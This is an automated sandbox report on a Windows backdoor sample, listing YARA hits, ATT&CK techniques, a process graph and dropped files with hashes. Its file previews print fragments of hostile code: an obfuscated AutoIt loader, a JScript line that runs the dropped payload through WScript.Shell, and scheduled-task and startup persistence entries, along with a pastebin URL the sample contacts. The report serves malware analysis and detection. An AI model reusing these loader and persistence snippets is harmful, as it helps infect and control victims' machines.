              Source: Yara matchFile source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_004C2263
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_004C1C61
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              2
              Valid Accounts
              11
              Windows Management Instrumentation
              111
              Scripting
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              121
              Input Capture
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol121
              Input Capture
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter
              2
              Valid Accounts
              2
              Valid Accounts
              21
              Obfuscated Files or Information
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              1
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              21
              Access Token Manipulation
              2
              Software Packing
              NTDS28
              System Information Discovery
              Distributed Component Object ModelInput Capture11
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd2
              Registry Run Keys / Startup Folder
              212
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets41
              Security Software Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Scheduled Task/Job
              111
              Masquerading
              Cached Domain Credentials4
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
              Registry Run Keys / Startup Folder
              2
              Valid Accounts
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
              Virtualization/Sandbox Evasion
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
              Process Injection
              Network Sniffing1
              Remote System Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
              System Network Configuration Discovery
              Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417469 Sample: SecuriteInfo.com.Backdoor.W... Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 75 sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 11 other signatures 2->83 10 SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe 21 2->10         started        13 wscript.exe 1 1 2->13         started        16 wscript.exe 1 2->16         started        18 wscript.exe 2->18         started        signatures3 process4 file5 61 C:\Users\user\AppData\Local\...61ortheast, PE32 10->61 dropped 20 cmd.exe 1 10->20         started        93 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->93 23 EcoScape.pif 13->23         started        25 EcoScape.pif 16->25         started        27 EcoScape.pif 18->27         started        signatures6 process7 signatures8 85 Uses ping.exe to sleep 20->85 87 Drops PE files with a suspicious file extension 20->87 89 Uses schtasks.exe or at.exe to add and modify task schedules 20->89 91 Uses ping.exe to check the status of other devices and networks 20->91 29 Telecom.pif 5 20->29         started        33 PING.EXE 1 20->33         started        36 cmd.exe 2 20->36         started        38 8 other processes 20->38 process9 dnsIp10 63 C:\Users\user\AppData\Local\...coScape.pif, PE32 29->63 dropped 65 C:\Users\user\AppData\Local\...coScape.js, ASCII 29->65 dropped 67 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 29->67 dropped 95 Drops PE files with a suspicious file extension 29->95 97 Writes to foreign memory regions 29->97 99 Injects a PE file into a foreign processes 29->99 40 cmd.exe 2 29->40         started        43 cmd.exe 1 29->43         started        45 RegAsm.exe 29->45         started        47 RegAsm.exe 29->47         started        73 127.0.0.1 unknown unknown 33->73 69 C:\Users\user\AppData\Local\...\Telecom.pif, PE32 36->69 dropped 71 C:\Users\user\AppData\Local\Microsoft\...\R, ASCII 38->71 dropped 49 conhost.exe 38->49         started        file11 signatures12 process13 file14 59 C:\Users\user\AppData\...coScape.url, MS 40->59 dropped 51 conhost.exe 40->51         started        53 conhost.exe 43->53         started        55 schtasks.exe 1 43->55         started        57 WerFault.exe 45->57         started        process15

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe21%VirustotalBrowse
              SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe21%ReversingLabsWin32.Trojan.Leonem
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif0%ReversingLabs
              C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif1%VirustotalBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe0%VirustotalBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif1%VirustotalBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast4%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast1%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://pastebin.com/raw/Dh8E7H3Rfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.autoitscript.com/autoit3/XTelecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.drfalse
                    high
                    http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exefalse
                      high
                      https://www.autoitscript.com/autoit3/Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        IP
                        127.0.0.1
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1417469
                        Start date and time:2024-03-29 11:37:17 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 55s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:42
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winEXE@46/20@1/1
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 86
                        • Number of non-executed functions: 249
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target RegAsm.exe, PID 1180 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        TimeTypeDescription
                        11:38:11Task SchedulerRun new task: Impaired path: wscript s>//B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
                        11:38:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url
                        13:11:07API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                        No context
                        No context
                        No context
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exepackage80171530600.jpg.lnkGet hashmaliciousXWormBrowse
                          QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                            KFft85YL3j.exeGet hashmaliciousRedLineBrowse
                              order - NLDB-082-2024.batGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                654309786.vbsGet hashmaliciousXWormBrowse
                                  409182726.vbsGet hashmaliciousXWormBrowse
                                    762544342.vbsGet hashmaliciousXWormBrowse
                                      2132544253.vbsGet hashmaliciousXWormBrowse
                                        zUTPSuwGIB.exeGet hashmaliciousPureLog Stealer, RisePro StealerBrowse
                                          file.exeGet hashmaliciousPureLog Stealer, RisePro StealerBrowse
                                            C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifpackage80171530600.jpg.lnkGet hashmaliciousXWormBrowse
                                              QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                                                4U9frILl8q.exeGet hashmaliciousUnknownBrowse
                                                  4U9frILl8q.exeGet hashmaliciousUnknownBrowse
                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
                                                    File Type:ASCII text, with very long lines (943), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):484144
                                                    Entropy (8bit):5.263538555806433
                                                    Encrypted:false
                                                    SSDEEP:6144:TaDj35GRl4eYXp8eaEC5VKRL9Ug9hkB6BBq3VG/CB0jse5:TTLEUko34t
                                                    MD5:A8384A3F77CF55416BF3C996DEB5E11C
                                                    SHA1:FB77D6B37D48394B75C0B2E18345E6358BC500C6
                                                    SHA-256:DBAB0BDD3B8589B95B3839FB64A1C277C62BF0777FAA03DDE69AA883F2E3BFA1
                                                    SHA-512:63F78B82D75427AD05A9844512310DAAA7FBC90A5E389C1EB6ED9E659065EE3930477B34ACA68C3B1D198D47EC847F913A68B6E0E680A8D02278ADAF8C683E99
                                                    Malicious:false
                                                    Preview:..Func BagsObserveLindsayRegistration($LPSYMANTEC, $LIMITATIONCONSPIRACYANNOTATEDBOND, $MANCHESTERVIEWINGACRE, $ExpandingTaiwan, $performtomatoletboring)..$GOVERNMENTDISTINCTION = '459283316547'..While 502..$preventingfixesexpanding = 429..Switch $preventingfixesexpanding..Case 428..Log(7223)..MemGetStats()..ObjGet(Controversial("83z107z103z121z123z120z107z115z107z116z122z121z100z76z107z114z114z117z125z100",7-1))..Floor(479)..PixelGetColor(Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1), Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1))..DirGetSize(Controversial("106z111z117z102z115z98z100z117z34z118z116z99z34z106z111z34z101z102z103z102z111z101z34",1-0))..Ceiling(9421)..ProgressOff()..$preventingfixesexpanding = $preventingfixesexpanding + 198328/198328..Case 429..$occursaluminiumnamely = Floor(382)..ExitLoop..Case 430..ObjGet(Controversial("70z81z89z80z78z81z67z70z34",2-0))..DirGetSize(Controversial("111z108z115z107z52z119z118z121z123z121z104z1
                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):185
                                                    Entropy (8bit):4.770640588502847
                                                    Encrypted:false
                                                    SSDEEP:3:RiMIpGXJO9oMeNH5E5wWAX+d4a+kEkD5gdzcQK9P8y5uWAX+d4a+kEkD5gdzcQKU:RiJuOytNHCwWD+vkD7rP8ywWD+vkD7rm
                                                    MD5:CA880452D2622FBE238A01ACB8D73CCB
                                                    SHA1:B3F5C3898EEE72AF66260BE8924AC2E988FB7C26
                                                    SHA-256:91E00907B1415FEB75080793106234C3B08C4863B6F39DD9773417BF11B619B5
                                                    SHA-512:5E53A65F5145757B048A1EAAC949B716CB9597E74E59A27AEDD67399C70D75B3CFE521E742A862A6339FA4FA375CAC66C3183A6185D12B21A757A007ECC11D10
                                                    Malicious:true
                                                    Preview:new ActiveXObject("Wscript.Sh" + "ell").Run("\"C:\\Users\\user\\AppData\\Local\\EcoVision Dynamics\\EcoScape.pif\" \"C:\\Users\\user\\AppData\\Local\\EcoVision Dynamics\\A\"")
                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):947288
                                                    Entropy (8bit):6.630612696399572
                                                    Encrypted:false
                                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                    MD5:62D09F076E6E0240548C2F837536A46A
                                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                    Joe Sandbox View:
                                                    • Filename: package80171530600.jpg.lnk, Detection: malicious, Browse
                                                    • Filename: QJwM0vJ5mk.exe, Detection: malicious, Browse
                                                    • Filename: 4U9frILl8q.exe, Detection: malicious, Browse
                                                    • Filename: 4U9frILl8q.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with very long lines (943), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):484144
                                                    Entropy (8bit):5.263538555806433
                                                    Encrypted:false
                                                    SSDEEP:6144:TaDj35GRl4eYXp8eaEC5VKRL9Ug9hkB6BBq3VG/CB0jse5:TTLEUko34t
                                                    MD5:A8384A3F77CF55416BF3C996DEB5E11C
                                                    SHA1:FB77D6B37D48394B75C0B2E18345E6358BC500C6
                                                    SHA-256:DBAB0BDD3B8589B95B3839FB64A1C277C62BF0777FAA03DDE69AA883F2E3BFA1
                                                    SHA-512:63F78B82D75427AD05A9844512310DAAA7FBC90A5E389C1EB6ED9E659065EE3930477B34ACA68C3B1D198D47EC847F913A68B6E0E680A8D02278ADAF8C683E99
                                                    Malicious:true
                                                    Preview:..Func BagsObserveLindsayRegistration($LPSYMANTEC, $LIMITATIONCONSPIRACYANNOTATEDBOND, $MANCHESTERVIEWINGACRE, $ExpandingTaiwan, $performtomatoletboring)..$GOVERNMENTDISTINCTION = '459283316547'..While 502..$preventingfixesexpanding = 429..Switch $preventingfixesexpanding..Case 428..Log(7223)..MemGetStats()..ObjGet(Controversial("83z107z103z121z123z120z107z115z107z116z122z121z100z76z107z114z114z117z125z100",7-1))..Floor(479)..PixelGetColor(Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1), Controversial("75z78z35z35z35z35z79z76z81z72z68z85z35z35z35z35",4-1))..DirGetSize(Controversial("106z111z117z102z115z98z100z117z34z118z116z99z34z106z111z34z101z102z103z102z111z101z34",1-0))..Ceiling(9421)..ProgressOff()..$preventingfixesexpanding = $preventingfixesexpanding + 198328/198328..Case 429..$occursaluminiumnamely = Floor(382)..ExitLoop..Case 430..ObjGet(Controversial("70z81z89z80z78z81z67z70z34",2-0))..DirGetSize(Controversial("111z108z115z107z52z119z118z121z123z121z104z1
                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif
                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):65440
                                                    Entropy (8bit):6.049806962480652
                                                    Encrypted:false
                                                    SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                    MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                    SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                    SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                    SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Joe Sandbox View:
                                                    • Filename: package80171530600.jpg.lnk, Detection: malicious, Browse
                                                    • Filename: QJwM0vJ5mk.exe, Detection: malicious, Browse
                                                    • Filename: KFft85YL3j.exe, Detection: malicious, Browse
                                                    • Filename: order - NLDB-082-2024.bat, Detection: malicious, Browse
                                                    • Filename: 654309786.vbs, Detection: malicious, Browse
                                                    • Filename: 409182726.vbs, Detection: malicious, Browse
                                                    • Filename: 762544342.vbs, Detection: malicious, Browse
                                                    • Filename: 2132544253.vbs, Detection: malicious, Browse
                                                    • Filename: zUTPSuwGIB.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):947288
                                                    Entropy (8bit):6.630612696399572
                                                    Encrypted:false
                                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                    MD5:62D09F076E6E0240548C2F837536A46A
                                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):110592
                                                    Entropy (8bit):6.624999634300709
                                                    Encrypted:false
                                                    SSDEEP:3072:yCE0Imbi80PtCZEMnVIPPBxT/sZydTmRxl:yClbfSCOMVIPPL/sZv
                                                    MD5:D766F32452AB37F9D3F7442B79D3C7AA
                                                    SHA1:A64451C419B835C894C4CCBAEC1F3B677FFB2865
                                                    SHA-256:D746AAB00DA0D7A6642B750B8E74ECBB6E06A697A86C12C2E53D5402B2CB4F76
                                                    SHA-512:BDA8B83D5CA2AB979286D7EB5179A5F2F998855AF08E09F9732813C935429C8404ACCF8EAA16B087D087314FAD5F2CAF5067C14E6EF61B699F71A4C89FC32AC4
                                                    Malicious:false
                                                    Preview:^.0.Tg....^].W..+....>f.....f..t....u._..u.3.f....2..j"..3....U..E.;E.v....].....]..U...0...L.3.E..E..E.V.u...u...1..j.^.0..f.....{...3.SW......M.}.].M.9.taj*Xf.E.j?Xf.E.3.f.E..E.P.6."T..YY..u..E.P3.PP.6.I.........M.QP.6.....................3.9.u..].}..M.+.3..M.......B...;.U.....#.t8.]....A..E.f.....f;E.u.+M.C.E........@.E.;.u.U.].].j..u.R..W.........u.....w.E....E..U.;.t\..+.E...A..E.f.....f;E.u.+M....A...+M.P.7.E..E...+.PR.9........uD.E.U..8....E...B.U.;.u..E.03...P.?g..Y.M..t....._[.M.3.^..G....].3.PPPPP.Ke....U..Q.M.SW3.Q.f.....f;.u..}.+......A+.M.;.v.j.X.WV._...j.S.....YY..t.W.u.SV........u5.u.+..~.u.SP.s........u..M.V.....j....f..Y..^_[..].3.PPPPP.d....U...`......L.3.E..U..M.S.].VWj\^j:.........../..._.....f;.....t.f;.t.f;.t....;.u...1f;.u..C.;.t.R3.WWS............j/..3.Zf;.t.j\Zf;.t.j:Zf;.t.....3.@+......A..hP.....#.............WP./_...........WWWPWS....I......u3......PWWS.v...........t.V....I...M._^3.[.0F....]......j..A.+..........Xf
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):115712
                                                    Entropy (8bit):5.194530949630662
                                                    Encrypted:false
                                                    SSDEEP:1536:iKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo:86whxjgarB/5elDWy4Z
                                                    MD5:D42D5B6C62FC16537F9E02F6878A726B
                                                    SHA1:558D6606042464216A725CDD4FFA5FBEE3F89754
                                                    SHA-256:6DA998806AF8D45879B783B961B647DF7FE5B37CC182EFF6756DA0CA6079C4AB
                                                    SHA-512:D5C843BE29F1A0D5F1A5DA701D98B6623D628A419D4A26854871E400E91CEEBCEC0FD8DA48116F9942AA8A41390405B5F10C9F7B447049BB9085C36ADE8CFF61
                                                    Malicious:false
                                                    Preview:................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................r.r.r.........r.r.r.r.r.r.r.r.r.r.r.r.........................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.........................r.r.r.r.................................................................................................................r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.........................
                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
                                                    File Type:ASCII text, with very long lines (1047), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16631
                                                    Entropy (8bit):5.03845012402483
                                                    Encrypted:false
                                                    SSDEEP:384:qGCv/Va67w3ovnAP+k0YCFxFngvMdP0t1jEdKo/TeS3A/UD:Ev/VaAXAmOCdYMd+IbTTv
                                                    MD5:374D1802B678505470AF77CC3FC02DFC
                                                    SHA1:44A6E2EA73DE59223D6A52C0D2447AFD2951BA3D
                                                    SHA-256:41E793CFB1B80F7FBF67DC2F2C00FD64DD37EB149F9C096C53A9024CA8BE7636
                                                    SHA-512:F2B07757D20526188A112B6599DA04FDAF7D0CC18EB1DB9E12C81711537E5324B5DC617F96D4D92E51D6C0E1C274677B3F2E294A00F5D7AA74BBFE5AA01A7E5D
                                                    Malicious:false
